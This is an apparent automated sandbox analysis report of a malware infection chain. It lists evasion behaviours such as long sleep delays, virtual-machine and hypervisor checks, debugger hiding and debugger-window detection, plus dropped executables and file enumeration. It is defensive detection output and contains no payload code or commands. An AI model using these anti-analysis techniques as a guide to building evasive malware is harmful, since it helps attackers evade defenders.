Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe TID: 7592 | Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe TID: 8172 | Thread sleep time: -1122000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe TID: 8096 | Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe TID: 8100 | Thread sleep time: -54027s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6460 | Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\jnxnee\benskvi.exe TID: 6620 | Thread sleep time: -44022s >= -30000s
Source: C:\ProgramData\jnxnee\benskvi.exe TID: 420 | Thread sleep time: -44022s >= -30000s
Source: C:\ProgramData\jnxnee\benskvi.exe TID: 4732 | Thread sleep time: -48024s >= -30000s
Source: C:\ProgramData\jnxnee\benskvi.exe TID: 6884 | Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\jnxnee\benskvi.exe TID: 6768 | Thread sleep time: -46023s >= -30000s
Source: C:\ProgramData\jnxnee\benskvi.exe TID: 1492 | Thread sleep time: -40020s >= -30000s
Source: C:\ProgramData\jnxnee\benskvi.exe TID: 6788 | Thread sleep time: -48024s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5248 | Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4736 | Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3240 | Thread sleep count: 1461 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5188 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1212 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5820 | Thread sleep count: 2455 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1968 | Thread sleep count: 477 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5324 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5364 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1428 | Thread sleep count: 3881 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1428 | Thread sleep count: 718 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5508 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5512 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300 | Thread sleep time: -4611686018427385s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4380Thread sleep time: -922337203685477s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5180Thread sleep count: 5930 > 30
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -11068046444225724s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 147 > 30
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep time: -30000s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\mshta.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\mshta.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00C7DBBE
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C4C2A2 FindFirstFileExW | 0_2_00C4C2A2
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C868EE FindFirstFileW,FindClose | 0_2_00C868EE
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 0_2_00C8698F
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00C7D076
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00C7D3A9
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00C89642
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00C8979D
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00C89B2B
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C85C97 FindFirstFileW,FindNextFileW,FindClose | 0_2_00C85C97
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: 20_2_00BEF011 FindFirstFileExW | 20_2_00BEF011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 21_2_00CEF011 FindFirstFileExW | 21_2_00CEF011
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_00C142DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe | Thread delayed: delay time: 60000
Source: C:\ProgramData\jnxnee\benskvi.exe | Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: powershell.exe, 00000009.00000002.1466076584.000001DDD56AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: rapes.exe, rapes.exe, 0000000D.00000002.1443703711.00000000004A9000.00000040.00000001.01000000.0000000F.sdmp, TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000E.00000002.1457153178.0000000000819000.00000040.00000001.01000000.0000000B.sdmp, ILqcVeT.exe, 00000017.00000002.2388746724.00000000013AB000.00000040.00000001.01000000.00000013.sdmp, vertualiziren.exe, 00000018.00000002.2029919575.000000000058F000.00000040.00000001.01000000.00000014.sdmp, TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 0000002D.00000002.2197219024.0000000000359000.00000040.00000001.01000000.0000001A.sdmp, TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 00000031.00000002.2294686273.0000000000359000.00000040.00000001.01000000.0000001A.sdmp, 7dbaa342f5.exe, 0000003E.00000002.2520912496.0000000000A5F000.00000040.00000001.01000000.0000001B.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BA82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: powershell.exe, 00000006.00000002.1355470671.000000000090A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ya
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000B.00000003.1381343566.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000006.00000002.1370376809.00000000070E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BA82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: powershell.exe, 00000006.00000002.1370376809.00000000070E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6%
Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000040.00000003.2286459077.0000000002758000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000004.00000003.1316421791.000000000315D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\kAZ
Source: mshta.exe, 00000004.00000002.1324902042.0000000003167000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.A[
Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBn9=
Source: powershell.exe, 0000003A.00000002.2403168393.0000000007709000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000004.00000003.1316421791.000000000315D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
Source: mshta.exe, 0000003C.00000003.2398840479.000001BBF89FB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\o~J
Source: powershell.exe, 0000003A.00000002.2415061821.0000000007791000.00000004.00000020.00020000.00000000.sdmp, 7dbaa342f5.exe, 0000003E.00000002.2552200343.0000000001312000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2548889037.000000000714D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000023.00000002.2188885216.0000000007AE6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll77
Source: nhDLtPT.exe, 00000014.00000003.1882424436.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X7
Source: mshta.exe, 00000040.00000003.2242450929.0000000002758000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BA82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: mshta.exe, 00000020.00000003.2096505229.0000000002F29000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ec
Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BA82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: powershell.exe, 00000023.00000002.2189896984.0000000007B8B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>
Source: ILqcVeT.exe, 00000017.00000002.2378435053.000000000075E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: mshta.exe, 00000025.00000002.2156888222.0000023115B70000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\z!
Source: powershell.exe, 00000009.00000002.1468143447.000001DDD58FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
Source: rXOl0pp.exe, 00000019.00000003.2063180045.00000000053A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: E2/FvMCIGFG62TGOU
Source: mshta.exe, 0000003C.00000003.2398840479.000001BBF89FB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5~
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000B.00000002.1410046761.0000000000819000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000C.00000002.1440658928.00000000004A9000.00000040.00000001.01000000.0000000F.sdmp, rapes.exe, 0000000D.00000002.1443703711.00000000004A9000.00000040.00000001.01000000.0000000F.sdmp, TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000E.00000002.1457153178.0000000000819000.00000040.00000001.01000000.0000000B.sdmp, ILqcVeT.exe, 00000017.00000002.2388746724.00000000013AB000.00000040.00000001.01000000.00000013.sdmp, vertualiziren.exe, 00000018.00000002.2029919575.000000000058F000.00000040.00000001.01000000.00000014.sdmp, TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 0000002D.00000002.2197219024.0000000000359000.00000040.00000001.01000000.0000001A.sdmp, TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 00000031.00000002.2294686273.0000000000359000.00000040.00000001.01000000.0000001A.sdmp, 7dbaa342f5.exe, 0000003E.00000002.2520912496.0000000000A5F000.00000040.00000001.01000000.0000001B.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: powershell.exe, 0000003A.00000002.2403168393.0000000007709000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5ke\?ai3
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | System information queried: ModuleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Thread information set: HideFromDebugger
Source: C:\ProgramData\jnxnee\benskvi.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | File opened: SIWVID
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Process queried: DebugPort
Source: C:\ProgramData\jnxnee\benskvi.exe | Process queried: DebugPort
Source: C:\ProgramData\jnxnee\benskvi.exe | Process queried: DebugPort
Source: C:\ProgramData\jnxnee\benskvi.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Process queried: DebugPort
